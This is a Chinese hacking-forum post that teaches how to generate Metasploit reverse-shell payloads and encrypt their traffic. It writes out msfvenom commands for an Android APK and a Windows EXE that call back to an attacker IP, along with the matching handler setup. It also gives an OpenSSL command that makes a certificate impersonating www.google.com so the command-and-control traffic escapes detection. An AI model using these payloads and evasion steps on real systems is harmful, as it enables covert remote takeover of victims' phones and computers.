跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于
在msf中生成shell,并上线运行时。都是通过http https tcp等协议传输。并没有加密,传输内容容易被检测和发现。

如下,我们简单生成一个Android平台的shell。

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.123.33 LPORT=5555 R > bbs.apk

msf 配置信息如下:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.123.33
set LPORT 5555
exploit

1186860087.png
很容易发现,我们的操作都是已明文的形式传输。
2474569335.png

加密msf流量

创建证书

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt

3454913373.png
注意:代码输入格式参考图片。这样会在桌面生成一个www.bbskali.cn.pem的证书
2547906615.png
生成加密的shell

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.123.33 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o bbskali.exe

2188120349.png
msf参数配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_winhttps
set lhost 192.168.123.33
set lport 443
set HandlerSSLCert www.google.com.pem #注意文件位置
set StagerVerifySSLCert true 

1265738133.png
运行shell后,我们再次抓包。发现流量全是密文了。
2292384291.png


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/3126.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。